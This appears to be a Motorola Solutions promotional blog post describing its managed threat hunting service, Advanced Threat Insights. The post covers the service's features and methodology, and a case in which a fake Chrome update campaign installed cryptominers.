Security alerts and other system and network health indicators don’t always reveal the whole picture of what’s going on in your environment, even when you’re looking for anomalies that can indicate something’s wrong. Proactively searching for threats can help you better prepare for potential issues you wouldn’t see otherwise so you can respond to them before a ransomware attack or data breach takes place. This can save time and resources that might otherwise be spent on incident response, which can in turn enable your team to focus on other important tasks.
Proactive threat hunting is critical for any organization concerned about cybersecurity. However, it requires a working knowledge of threat actor motivations and tactics, and the ability to access dark web activities to get insights into where threat actors are trading data or information on planned attacks. Most importantly, it also requires a mastery of endpoint detection and response tools that enable rich information to be gathered in real time across the network.
Many organizations find it difficult to hire and maintain staff with the skill sets and experience required to successfully run such a program, however. To help any size organization or public safety agency benefit from this capability, Motorola Solutions now offers Managed Threat Hunting via our Advanced Threat Insights (ATI) service. This is a premium offering as part of our Managed Detection and Response (MDR) services.
Advanced Threat Insights Features
Our threat hunters bring advanced expertise to help existing security teams get more focused on the top risks, and enable teams with less experience to get the best insights they can. Our Advanced Threat Insights services include many features, such as:
- Proactive Threat Hunting — We’ll do a weekly deep dive to explore tactics and techniques from threat actors most likely to target your organization. Expert analysts use endpoint detection and response (EDR) tools, ActiveEye security platform event data and network sensor data to look further for signs of potential or successful initial compromise.
- Deep and Dark Web Analysis — Continuous monitoring of dark web data sources to identify signs of data compromise, such as IP addresses or sensitive information is a critical feature of ATI and threat hunting. Our analysts look for accounts that may be compromised and domain names that attackers might have set up to establish phishing campaigns against your organization.
- Named Security Analyst— A named analyst focused on your organization’s unique challenges customizes recommendations for your specific environment and the threat actor landscape. Your analyst can answer whatever questions you have on threat actors, potential risks and what they’re seeing in other cyber attacks.
- Monthly Threat Insights Review — A monthly review of findings, threat actor activity and security strategy with your named analyst provides even more information. You can direct the threat hunting focus on different areas as threats and your organization evolve.
The ATI service can be enabled across any of our supported EDR security solutions, including Crowdstrike, VMWare Carbon Black, Palo Alto Cortex and Windows Defender Advanced Threat Protection (ATP). It can also be used in any environment with native ActiveEye integrations to our Network Detection sensor, including cloud environments, SaaS applications like Microsoft 365 and public safety infrastructure.
Threat Hunting Methodology
Our investigations are uniquely tailored to identify threats that have a significant likelihood of targeting your organization. A security analyst assesses your risks across different areas of your operations, like particular web applications or cloud infrastructure. They then use this model to research threat actors who have previously been identified as using the techniques, tactics, and procedures (TTPs) that target them.
These TTPs are then translated into queries for your EDR technology and the findings are analyzed by our security team. High risk findings are immediately escalated to your team. Lower risk findings, or those that require more research by our analysts, are reviewed on your monthly call.
Oftentimes, the sudden emergence of a zero-day vulnerability like Log4j can be the focus of a threat hunt to help you remediate high-risk issue. They can also provide additional detection coverage during remediation or patching. In many cases, after the queries have been drafted, our analysts will take the extra step to tune out false positives and transform the query into an ongoing detection. This will trigger an alert on any future activity for our security operation center (SOC) to respond to, thus assisting in vulnerability management.
Use Case: Uncovering Evasive Threats That Bypass EDR
One of our threat hunting engagements focused on discovering evasive techniques used to defeat EDR execution prevention capabilities, based on previous documented threat actor activity in past incidents the customer had experienced. To put it in simpler terms, we looked for techniques that threat actors were using to bypass endpoint detection solutions in this customer’s environment based on what they’d tried in the past. The threat hunt focused on dozens of various techniques for using trusted system utilities to download and execute malicious code, which granted the attacker initial access to a system.
Our analysts uncovered multiple devices that had recently been compromised by a fake update campaign for Google Chrome browser. Victims were directed to a site misinforming them that their web browser was out of date, prompting them to download and run a trojanized updater file. This malicious file surreptitiously forced compromised computers to mine digital money — a very resource-heavy activity that slowed down all other operations — without the users knowing it. The file used one of the very techniques our threat hunting was designed to discover. As a result, our security team was able to quarantine these devices and collaborate with the customer to remediate these threats before any sensitive data was put at risk.
Summary
Proactively hunting for cyber threats isn’t just a nice-to-have feature anymore. It can save you time, money and headaches, as well as prevent costly data breaches or ransomware attacks that can shut down your mission-critical systems. With ATI, you get a dedicated security expert to optimize your threat detection and get actionable insights. You can decide how to best use the monthly sync with your named analyst. Some organizations choose to dig deep into the threat hunting queries, while others choose to capture high-level threat trends for agency or board stakeholder discussions and tracking key performance indicators (KPIs). In either case, we find ATI helps refine the organization’s security strategy and justify cybersecurity spend.
